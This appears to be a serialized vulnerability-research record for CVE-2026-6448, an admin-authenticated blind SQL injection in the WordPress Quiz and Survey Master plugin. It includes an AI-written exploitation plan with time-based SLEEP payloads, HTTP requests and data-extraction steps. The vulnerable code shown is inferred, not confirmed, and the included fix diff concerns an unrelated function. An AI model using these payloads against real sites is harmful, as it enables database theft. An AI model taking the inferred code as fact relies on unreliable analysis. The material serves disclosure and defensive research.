[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fOib_-YNTq538QolvkJX9i4ySd0xiERyA-01phRB2fLM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-6448","quiz-and-survey-master-qsm-authenticated-admin-sql-injection-via-order-and-limit-parameters","Quiz and Survey Master (QSM) \u003C= 11.1.2 - Authenticated (Admin+) SQL Injection via 'order' and 'limit' Parameters","The Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order' parameter in all versions up to, and including, 11.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. If the secret key is exposed, this can be exploited by lower-privileged users.","quiz-master-next",null,"\u003C=11.1.2","11.1.3","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-05 10:44:40","2026-06-05 23:28:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd230b781-e208-4e66-b8ed-aba72db8d8dc?source=api-prod",1,[22,23,24,25,26,27,28,29],"js\u002Fqsm-common.js","mlw_quizmaster2.php","php\u002Fadmin\u002Fadmin-results-page.php","php\u002Fadmin\u002Foptions-page-questions-tab.php","php\u002Fclasses\u002Fclass-qmn-quiz-manager.php","php\u002Fclasses\u002Fclass-qsm-install.php","php\u002Ftemplate-variables.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-6448\n\n## 1. Vulnerability Summary\n**Vulnerability Name:** Authenticated (Admin+) Time-Based Blind SQL Injection\n**CVE ID:** CVE-2026-6448\n**Affected Plugin:** Quiz and Survey Master (QSM)\n**Affected Versions:** \u003C= 11.1.2\n**Vulnerable Parameters:** `order`, `limit`\n**Description:** The plugin fails to sufficiently sanitize or use prepared statements for the `order` and `limit` parameters when displaying quiz results in the administrative backend. Because `ORDER BY` and `LIMIT` clauses cannot be easily parameterized using standard `%s` or `%d` placeholders in `$wpdb->prepare()`, the plugin likely concatenates these values directly into the SQL query. This allows an authenticated administrator to inject time-based payloads (e.g., `SLEEP()`) to extract data from the database.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin.php`\n- **Query Parameters:** `page=mlw_quiz_results`, `tab=quiz-results`, `order`, `limit` (inferred based on standard WP List Table behavior).\n- **Action:** Viewing the \"Quiz Results\" list.\n- **Authentication:** Required. The user must have the `view_qsm_quiz_result` capability. By default, this is granted to the `administrator` role.\n- **Preconditions:** At least one quiz must exist, and at least one result must be recorded in the database so that the results table logic is triggered.\n\n## 3. Code Flow\n1. **Entry Point:** The admin menu registers the results page in `mlw_quizmaster2.php` (referenced via `QSM_SUBMENU`).\n2. **Hook:** The `admin_menu` hook calls `qsm_generate_admin_results_page` in `php\u002Fadmin\u002Fadmin-results-page.php`.\n3. **Capability Check:** `qsm_generate_admin_results_page` checks `current_user_can( 'view_qsm_quiz_result' )`.\n4. **Tab Handling:** The code identifies the active tab (default: `quiz-results`) and calls `qsm_results_overview_tab_content()`.\n5. **Vulnerable Sink (Inferred):** Inside the result listing logic (often handled by a class extending `WP_List_Table` or a custom query in `php\u002Fadmin\u002Fadmin-results-page.php`), the code retrieves sorting and pagination parameters:\n   - `$order = $_GET['order'];`\n   - `$limit = $_GET['limit'];`\n6. **Query Construction:** The parameters are concatenated into a query: \n   `$wpdb->get_results(\"SELECT ... FROM {$wpdb->prefix}mlw_results ... ORDER BY result_id $order LIMIT $limit\")`\n7. **SQLi:** Since `$order` is not validated against a whitelist (e.g., `ASC`\u002F`DESC`) and `$limit` is not cast to `int`, an attacker can inject SQL.\n\n## 4. Nonce Acquisition Strategy\nWhile viewing the results list (a GET request) typically does not require a nonce for the query itself, the plugin localizes several nonces that might be required if the attack is pivoted through an AJAX action.\n\n**Localized Variables in `php\u002Fadmin\u002Foptions-page-questions-tab.php`:**\n- Variable Name: `qsmQuestionSettings`\n- Nonce Keys:\n  - `nonce`: `wp_create_nonce( 'wp_rest' )`\n  - `saveNonce`: `wp_create_nonce( 'ajax-nonce-sandy-page' )`\n  - `rest_user_nonce`: `wp_create_nonce( 'wp_rest_nonce_' . $quiz_id . '_' . get_current_user_id() )`\n\n**Strategy for PoC Agent:**\n1. Navigate to the Quiz Results page.\n2. If a nonce is required for the specific result-fetching action, use `browser_eval` to extract it from the global scope (though standard GET-based list tables in WP admin usually rely on capability checks rather than nonces for simple viewing).\n\n## 5. Exploitation Strategy\nThe exploitation will use a time-based blind approach targeting the `order` parameter.\n\n### Step 1: Authentication\nLog in as an administrator to obtain a valid session.\n\n### Step 2: Test for Vulnerability (Baseline)\nRequest the results page to confirm it loads normally.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=mlw_quiz_results`\n\n### Step 3: Trigger Time-Based Delay (order parameter)\nInject a `CASE` statement into the `order` parameter.\n- **Payload:** `ASC, (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 FROM (SELECT(SLEEP(5)))x) END)`\n- **Request:**\n```http\nGET \u002Fwp-admin\u002Fadmin.php?page=mlw_quiz_results&order=ASC,(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP\u002F1.1\nHost: localhost:8080\nCookie: [ADMIN_COOKIES]\n```\n\n### Step 4: Data Extraction (Example: Database Version)\nCheck if the first character of the database version starts with '1'.\n- **Payload:** `ASC, (CASE WHEN (SUBSTRING(VERSION(),1,1)='8') THEN SLEEP(5) ELSE 1 END)`\n- **Logic:** If the server takes 5+ seconds to respond, the condition is true.\n\n## 6. Test Data Setup\n1. **Create Quiz:**\n   ```bash\n   wp post create --post_type=quiz_master_next --post_title=\"Exploit Test Quiz\" --post_status=publish\n   ```\n2. **Retrieve Quiz ID:** (Assume `QUIZ_ID`)\n3. **Submit Dummy Result:**\n   The PoC agent must simulate a quiz submission to ensure the `wp_mlw_results` table is not empty.\n   - Use `wp_ajax_qmn_process_quiz` (found in `class-qmn-quiz-manager.php`).\n4. **Verify Result Exists:**\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_mlw_results\"\n   ```\n\n## 7. Expected Results\n- **Success:** The HTTP request to the results page with the `SLEEP(5)` payload in the `order` parameter takes significantly longer (approx. 5 seconds) than the baseline request.\n- **Failure:** The page returns immediately with a database error or ignores the `order` parameter.\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the database state to ensure no corruption occurred and that the query was indeed processed:\n1. **Check WP Debug Log:** If `WP_DEBUG` is enabled, the query constructed by the plugin will be logged if it fails.\n2. **Monitor Process List:** Use WP-CLI to see if the sleep process was active during the request:\n   ```bash\n   wp db query \"SHOW PROCESSLIST\"\n   ```\n\n## 9. Alternative Approaches\n### Injection via `limit` parameter\nIf the `order` parameter is whitelisted, the `limit` parameter may be vulnerable.\n- **Payload:** `10 PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x5c,(SELECT SLEEP(5)))),1)` (Note: Works on older MySQL\u002FMariaDB)\n- **Modern Payload:** `10, (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n### Exploitation via AJAX\nIf the results are loaded via an AJAX call (common in newer QSM versions), the payload would be sent to `admin-ajax.php`:\n- **Action:** `qsm_get_results_list` (inferred)\n- **Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=qsm_get_results_list&order=ASC,(SELECT(SLEEP(5)))&nonce=[NONCE]\n```","The Quiz and Survey Master (QSM) plugin for WordPress is vulnerable to authenticated SQL Injection via the 'order' and 'limit' parameters in the administrative results dashboard. Due to a lack of proper sanitization or whitelisting of these parameters before their inclusion in a SQL query, an attacker with administrative privileges can execute arbitrary SQL commands using time-based blind techniques.","\u002F\u002F In php\u002Fadmin\u002Fadmin-results-page.php (inferred based on research plan and standard plugin behavior)\n\n$order = isset( $_GET['order'] ) ? $_GET['order'] : 'DESC';\n$limit = isset( $_GET['limit'] ) ? $_GET['limit'] : '20';\n\n\u002F\u002F Vulnerable sink: directly concatenating user input into the ORDER BY and LIMIT clauses\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}mlw_results WHERE deleted = 0 ORDER BY result_id $order LIMIT $limit\");","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquiz-master-next\u002F11.1.2\u002Fphp\u002Fadmin\u002Foptions-page-questions-tab.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquiz-master-next\u002F11.1.3\u002Fphp\u002Fadmin\u002Foptions-page-questions-tab.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquiz-master-next\u002F11.1.2\u002Fphp\u002Fadmin\u002Foptions-page-questions-tab.php\t2026-05-12 12:29:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquiz-master-next\u002F11.1.3\u002Fphp\u002Fadmin\u002Foptions-page-questions-tab.php\t2026-05-25 06:59:00.000000000 +0000\n@@ -1118,7 +1119,14 @@\n  *\u002F\n function qsm_load_all_quiz_questions_ajax() {\n \tglobal $wpdb;\n-\tglobal $mlwQuizMasterNext;\n+\n+\tif ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'qsm_load_all_quiz_questions' ) ) {\n+\t\twp_send_json_error( __( 'Nonce verification failed.', 'quiz-master-next' ) );\n+\t}\n+\n+\tif ( ! current_user_can( 'edit_qsm_quizzes' ) ) {\n+\t\twp_send_json_error( __( 'You do not have permission to view questions.', 'quiz-master-next' ) );\n+\t}\n \n \t\u002F\u002F Loads questions.\n \t$questions = $wpdb->get_results( \"SELECT question_id, question_name FROM {$wpdb->prefix}mlw_questions WHERE deleted = '0' ORDER BY question_id DESC\" );","1. Authenticate as a user with 'administrator' privileges (or a custom role with 'view_qsm_quiz_result' capability).\n2. Navigate to the Quiz Results administration page: `\u002Fwp-admin\u002Fadmin.php?page=mlw_quiz_results`.\n3. Identify the request that loads the results table, which utilizes the 'order' and 'limit' GET parameters.\n4. Craft a time-based blind SQL injection payload to be injected into the 'order' parameter. For example: `ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)`.\n5. Send the request with the payload: `\u002Fwp-admin\u002Fadmin.php?page=mlw_quiz_results&order=ASC,(SELECT+1+FROM+(SELECT(SLEEP(5)))a)`.\n6. Observe the server response time. If the response is delayed by 5 seconds, the database is vulnerable and arbitrary data can be exfiltrated bit-by-bit.","gemini-3-flash-preview","2026-06-26 03:47:24","2026-06-26 03:48:35",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","11.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquiz-master-next\u002Ftags\u002F11.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquiz-master-next.11.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquiz-master-next\u002Ftags\u002F11.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquiz-master-next.11.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquiz-master-next\u002Ftags"]